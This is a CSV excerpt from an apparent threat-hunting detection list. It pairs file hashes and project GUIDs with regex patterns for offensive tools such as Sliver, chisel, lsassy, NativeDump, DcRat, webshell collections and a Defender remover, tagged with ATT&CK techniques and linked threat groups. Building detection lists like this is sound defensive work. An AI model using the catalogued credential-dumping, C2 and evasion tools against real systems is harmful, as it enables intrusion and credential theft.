"*0DF38AD4-60AF-4F93-9C7A-7FB7BA692017*",".{0,1000}0DF38AD4\-60AF\-4F93\-9C7A\-7FB7BA692017.{0,1000}","offensive_tool_keyword","Volumiser","Volumiser is a command line tool and interactive console GUI for listing - browsing and extracting files from common virtual machine hard disk image formats.","T1560.001 - T1059 - T1114 - T1005","TA0005 - TA0009","N/A","N/A","Collection","https://github.com/CCob/Volumiser","1","0","#GUIDproject","N/A","7","4","379","42","2025-04-22T15:47:53Z","2022-11-08T21:38:56Z","21671"
"*0df3b8f4bb74d6867ee75afc9c79f76e6ceb4d1ebc7b708cc7b137791d6d15d3*",".{0,1000}0df3b8f4bb74d6867ee75afc9c79f76e6ceb4d1ebc7b708cc7b137791d6d15d3.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","21672"
"*0DF612AE-47D8-422C-B0C5-0727EA60784F*",".{0,1000}0DF612AE\-47D8\-422C\-B0C5\-0727EA60784F.{0,1000}","offensive_tool_keyword","NativeDump","Dump lsass using only Native APIs by hand-crafting Minidump files (without MinidumpWriteDump!)","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/ricardojoserf/NativeDump","1","0","#GUIDproject","N/A","10","6","586","86","2024-12-17T15:36:57Z","2024-02-22T15:16:16Z","21673"
"*0dfd57cb8299edf2e4a941d39ba787960de83f00b57c4f885bb141782a3b559b*",".{0,1000}0dfd57cb8299edf2e4a941d39ba787960de83f00b57c4f885bb141782a3b559b.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","21675"
"*0e0ea3fcb913470c6f7814cc1d943d51f687578f2d59a1a15101587cb0ff709d*",".{0,1000}0e0ea3fcb913470c6f7814cc1d943d51f687578f2d59a1a15101587cb0ff709d.{0,1000}","offensive_tool_keyword","subbrute","A DNS meta-query spider that enumerates DNS records and subdomains.","T1071.001 - T1083 - T1590.001","TA0043 - TA0007?","N/A","ENERGETIC BEAR","Reconnaissance","https://github.com/TheRook/subbrute","1","0","#filehash","N/A","5","10","3422","661","2022-01-13T09:25:59Z","2012-06-10T01:08:20Z","21677"
"*0e17084a14b6af8e50ae4917261546121279fd94299bea1f5fcaa77f18a0feaf*",".{0,1000}0e17084a14b6af8e50ae4917261546121279fd94299bea1f5fcaa77f18a0feaf.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","21682"
"*0e2229f85a0dca6457d05a619627075db242eb3fd0080d9a8fe8c102ce5fb71e*",".{0,1000}0e2229f85a0dca6457d05a619627075db242eb3fd0080d9a8fe8c102ce5fb71e.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","21684"
"*0e26255b8db0b2e2792225febc5d3adeebc02edff523e90156c76b5baf7ee9b3*",".{0,1000}0e26255b8db0b2e2792225febc5d3adeebc02edff523e90156c76b5baf7ee9b3.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","#filehash","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","21685"
"*0e2a30af2c626fd1f134d32daf8d615bfae7568fd43484e5f5fc489ceb0b2faf*",".{0,1000}0e2a30af2c626fd1f134d32daf8d615bfae7568fd43484e5f5fc489ceb0b2faf.{0,1000}","offensive_tool_keyword","Invoke-ArgFuscator","generate obfuscated command-lines for common system-native executables","T1027 - T1059 - T1202","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/wietze/Invoke-ArgFuscator","1","0","#filehash","N/A","10","2","161","28","2025-04-14T21:24:29Z","2022-11-20T17:59:23Z","21686"
"*0e2c629c26b6fc61459dc59764df329ad9d2bc80a9beee2063cdd1b5d30b2245*",".{0,1000}0e2c629c26b6fc61459dc59764df329ad9d2bc80a9beee2063cdd1b5d30b2245.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","21687"
"*0e2e712fe0bc1ddddc027c85d701be1175a3fc75fddb0a599dcd065d6385e0cb*",".{0,1000}0e2e712fe0bc1ddddc027c85d701be1175a3fc75fddb0a599dcd065d6385e0cb.{0,1000}","offensive_tool_keyword","ElusiveMice","Cobalt Strike User-Defined Reflective Loader with AV/EDR Evasion in mind","T1620 - T1055.012 - T1202","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/mgeeky/ElusiveMice","1","0","#filehash","N/A","10","5","449","78","2023-07-12T17:54:07Z","2021-08-27T19:22:20Z","21688"
"*0e2e76930ff8d2bea66b82db863243f3895d39e761893eb6de025325747774b6*",".{0,1000}0e2e76930ff8d2bea66b82db863243f3895d39e761893eb6de025325747774b6.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","#filehash","N/A","10","10","2231","405","2025-04-21T03:17:20Z","2017-04-05T17:05:10Z","21689"
"*0e313d439e080ae59303f87afe484717dab784c8df5f83dcd2745b51194582a8*",".{0,1000}0e313d439e080ae59303f87afe484717dab784c8df5f83dcd2745b51194582a8.{0,1000}","offensive_tool_keyword","BlockEtw",".Net Assembly to block ETW telemetry in current process","T1055.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Soledge/BlockEtw","1","0","#filehash","N/A","10","1","78","19","2020-05-14T19:24:49Z","2020-05-14T02:40:50Z","21690"
"*0e313d439e080ae59303f87afe484717dab784c8df5f83dcd2745b51194582a8*",".{0,1000}0e313d439e080ae59303f87afe484717dab784c8df5f83dcd2745b51194582a8.{0,1000}","offensive_tool_keyword","BlockEtw",".Net Assembly to block ETW telemetry in current process","T1055.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Soledge/BlockEtw","1","0","#filehash","N/A","10","1","78","19","2020-05-14T19:24:49Z","2020-05-14T02:40:50Z","21691"
"*0e34604b09472922b088573ae7b8a2686982b05900251f861912e3d9d2760980*",".{0,1000}0e34604b09472922b088573ae7b8a2686982b05900251f861912e3d9d2760980.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","21692"
"*0e3c7a01a06f011d9bb7e184d4713f88bbb3def0118e70e2f58ca79966b7c067*",".{0,1000}0e3c7a01a06f011d9bb7e184d4713f88bbb3def0118e70e2f58ca79966b7c067.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","#filehash","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","21693"
"*0e3e7f92c7f8f10535a6a15079813e2b8a3f5e4cfc00a275d2a2e917539306d2*",".{0,1000}0e3e7f92c7f8f10535a6a15079813e2b8a3f5e4cfc00a275d2a2e917539306d2.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","21694"
"*0e411f4a58f7ca4e77a39c810bd1cb44eca9f8cbae2a20d1c3ed6d3f1b9c4f81*",".{0,1000}0e411f4a58f7ca4e77a39c810bd1cb44eca9f8cbae2a20d1c3ed6d3f1b9c4f81.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","21695"
"*0E423DD6-FAAF-4A66-8828-6A5A5F22269B*",".{0,1000}0E423DD6\-FAAF\-4A66\-8828\-6A5A5F22269B.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#GUIDproject","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","21696"
"*0e452eb513a7218f3c9b38ba5e6fd89e3f78fa8ef27996de7e33810302b98bd8*",".{0,1000}0e452eb513a7218f3c9b38ba5e6fd89e3f78fa8ef27996de7e33810302b98bd8.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","21697"
"*0E4BAB8F-E6E0-47A8-8E99-8D451839967E*",".{0,1000}0E4BAB8F\-E6E0\-47A8\-8E99\-8D451839967E.{0,1000}","offensive_tool_keyword","EfiGuard","EfiGuard is a portable x64 UEFI bootkit that patches the Windows boot manager - boot loader and kernel at boot time in order to disable PatchGuard and Driver Signature Enforcement (DSE).","T1542.002 - T1542.003 - T1542.004","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mattiwatti/EfiGuard","1","0","#GUIDproject","N/A","10","10","1977","354","2025-02-24T11:57:36Z","2019-03-25T19:47:39Z","21698"
"*0e4d9ac31eb73e737d91d48b2c1a461798bf1773775e32a7bc508d3ed2460145*",".{0,1000}0e4d9ac31eb73e737d91d48b2c1a461798bf1773775e32a7bc508d3ed2460145.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","21699"
"*0e5ae252e2597d44f6e8def9fcdd3562954130a0261776e083959d067795c450*",".{0,1000}0e5ae252e2597d44f6e8def9fcdd3562954130a0261776e083959d067795c450.{0,1000}","offensive_tool_keyword","goWMIExec","re-implementation of invoke-wmiexec (Lateral Movement)","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/C-Sto/goWMIExec","1","0","#filehash","N/A","10","3","214","42","2023-02-25T01:41:41Z","2019-10-14T22:32:11Z","21700"
"*0e6425e589ee42d3d26e329534717ccab8113b6015841d3ab90cf23f56e37b0f*",".{0,1000}0e6425e589ee42d3d26e329534717ccab8113b6015841d3ab90cf23f56e37b0f.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","21703"
"*0e643bd5e3eaf43f5eee053904a24dac9bf05150885fcb32a606ef3ee1c7db1f*",".{0,1000}0e643bd5e3eaf43f5eee053904a24dac9bf05150885fcb32a606ef3ee1c7db1f.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","21704"
"*0e66df39efd2c71fc83017fd98bf187558a1793a06b8164f46561d28fc5e3e50*",".{0,1000}0e66df39efd2c71fc83017fd98bf187558a1793a06b8164f46561d28fc5e3e50.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","21705"
"*0e744d477bb40e89af274ecf70c339b9674699e4bfe984b5dd73a2b877369d48*",".{0,1000}0e744d477bb40e89af274ecf70c339b9674699e4bfe984b5dd73a2b877369d48.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","21709"
"*0e78fbbb84802086667efb08bed9f8773b86d9223b90599c33baee0ed26b761e*",".{0,1000}0e78fbbb84802086667efb08bed9f8773b86d9223b90599c33baee0ed26b761e.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","21710"
"*0E7A579798A6A57A88C6CBD5C67313E43B8F7D84DF4798C88142B134D48C263B*",".{0,1000}0E7A579798A6A57A88C6CBD5C67313E43B8F7D84DF4798C88142B134D48C263B.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","#filehash","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","21711"
"*0e7e01f0f50a6cd3bd6f7e76944d133405423317d747b62cc94b1ad1f6e923b3*",".{0,1000}0e7e01f0f50a6cd3bd6f7e76944d133405423317d747b62cc94b1ad1f6e923b3.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","21712"
"*0e83bafb7d54823e22c5fa5ff502924afb30c090471dcb9ba1c454b62ed5ca55*",".{0,1000}0e83bafb7d54823e22c5fa5ff502924afb30c090471dcb9ba1c454b62ed5ca55.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","21714"
"*0e8ad3e18880129b9042c97c891691f1437dd648a58480e0d4448a98718edbbf*",".{0,1000}0e8ad3e18880129b9042c97c891691f1437dd648a58480e0d4448a98718edbbf.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","21715"
"*0e8dfd9cc5fcd99e4ee93d4c015e49dd672ac1813c0270c4ff3ed8c1b9db85d1*",".{0,1000}0e8dfd9cc5fcd99e4ee93d4c015e49dd672ac1813c0270c4ff3ed8c1b9db85d1.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","#filehash","N/A","10","10","955","147","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z","21717"
"*0e8eff9d7c2a6d2cfa40a7530753cccffc959186c9e1a89eb623e2dd5bdcef6d*",".{0,1000}0e8eff9d7c2a6d2cfa40a7530753cccffc959186c9e1a89eb623e2dd5bdcef6d.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","21718"
"*0e95446bac57b2a3276703c700865bf025f1eac27bc5c9ebcf820c1e351b6732*",".{0,1000}0e95446bac57b2a3276703c700865bf025f1eac27bc5c9ebcf820c1e351b6732.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","21720"
"*0e9af89e0f2faa8d7f92d6e9538e19f82c701c798031d890978845e388b85ba6*",".{0,1000}0e9af89e0f2faa8d7f92d6e9538e19f82c701c798031d890978845e388b85ba6.{0,1000}","offensive_tool_keyword","ACEshark","uncover potential privilege escalation vectors by analyzing windows service configurations and Access Control Entries","T1058 - T1548","TA0004","N/A","N/A","Privilege Escalation","https://github.com/t3l3machus/ACEshark","1","0","#filehash","N/A","6","2","109","19","2025-01-15T07:01:48Z","2024-12-28T10:42:29Z","21723"
"*0ea533dd75837182416f5ffa7f51a36d82c407587068d0404c177f18709ffa63*",".{0,1000}0ea533dd75837182416f5ffa7f51a36d82c407587068d0404c177f18709ffa63.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","21725"
"*0eb04b75544e35cb6a285c97bbefa557050848d73ad9f8e7ff7a36ee7a36a68d*",".{0,1000}0eb04b75544e35cb6a285c97bbefa557050848d73ad9f8e7ff7a36ee7a36a68d.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","21727"
"*0ebce776a2758cb99ecc9a6ba97fc432e40925fbe1a4e068bbc7a273f6064269*",".{0,1000}0ebce776a2758cb99ecc9a6ba97fc432e40925fbe1a4e068bbc7a273f6064269.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","21729"
"*0ec459ed281c0ee777046a0a31b59500843a74f776a459a12438d6412f146001*",".{0,1000}0ec459ed281c0ee777046a0a31b59500843a74f776a459a12438d6412f146001.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","21730"
"*0ecd88de5d2728034f25bc04fcf9553198453fb46bbb93a00a74e6e74747435b*",".{0,1000}0ecd88de5d2728034f25bc04fcf9553198453fb46bbb93a00a74e6e74747435b.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","21732"
"*0ed6cbbe7b625c83c55e0cdb90f138301afc88e23d04e32eed39b078f7c2fa11*",".{0,1000}0ed6cbbe7b625c83c55e0cdb90f138301afc88e23d04e32eed39b078f7c2fa11.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","21736"
"*0ed7071221412e55b8fa13a88d21ef523186e621acfb3cf3fe0dd292c0a25951*",".{0,1000}0ed7071221412e55b8fa13a88d21ef523186e621acfb3cf3fe0dd292c0a25951.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","21737"
"*0ed8c3f90c77356f7d02574491f66586b96552efd0b6ef53d7de263893061bc5*",".{0,1000}0ed8c3f90c77356f7d02574491f66586b96552efd0b6ef53d7de263893061bc5.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","21738"
"*0ed9e5a905e2ec8e15e331561cc665ad5b5c5fe3ec34ffacea54b6ee51244b5c*",".{0,1000}0ed9e5a905e2ec8e15e331561cc665ad5b5c5fe3ec34ffacea54b6ee51244b5c.{0,1000}","offensive_tool_keyword","ROADtoken","Abusing Azure AD SSO with the Primary Refresh Token - ROADtoken is a tool that uses the BrowserCore.exe binary to obtain a cookie that can be used with SSO and Azure AD","T1557 - T1078 - T1071.001 - T1552.001","TA0006 ","N/A","N/A","Credential Access","https://github.com/dirkjanm/ROADtoken","1","0","#filehash","N/A","7","1","89","17","2020-09-30T16:18:47Z","2020-07-21T12:42:14Z","21739"
"*0ee13a1dc80aea39fb3306a3989be1fd14975cdad77b5e470946473e2024f4b0*",".{0,1000}0ee13a1dc80aea39fb3306a3989be1fd14975cdad77b5e470946473e2024f4b0.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","21740"
"*0ee4ed7184673d6fc1163f85c3da8a78f5aa1464eda290697a903c5adb7b0006*",".{0,1000}0ee4ed7184673d6fc1163f85c3da8a78f5aa1464eda290697a903c5adb7b0006.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","21741"
"*0eec76148fd7a3b1eb54d3fa71c30b5370d410e1eb81231ff0e9e66de3598aea*",".{0,1000}0eec76148fd7a3b1eb54d3fa71c30b5370d410e1eb81231ff0e9e66de3598aea.{0,1000}","offensive_tool_keyword","PrintNightmare","PrintNightmare exploitation","T1210 - T1059.001 - T1548.002","TA0001 - TA0002 - TA0004","N/A","Dispossessor","Privilege Escalation","https://github.com/outflanknl/PrintNightmare","1","0","#filehash","N/A","10","4","337","67","2021-09-13T08:45:26Z","2021-09-13T08:44:02Z","21742"
"*0eed39829e042cf451ff602078fc3ffcbcfff075bbd3c4a33ccd26e44a31a9fa*",".{0,1000}0eed39829e042cf451ff602078fc3ffcbcfff075bbd3c4a33ccd26e44a31a9fa.{0,1000}","offensive_tool_keyword","cliws","Cross platform interactive bind/reverse PTY shell","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","Dispossessor","C2","https://github.com/b23r0/cliws","1","0","#filehash","N/A","10","10","159","29","2023-11-06T02:19:16Z","2021-10-24T04:10:07Z","21743"
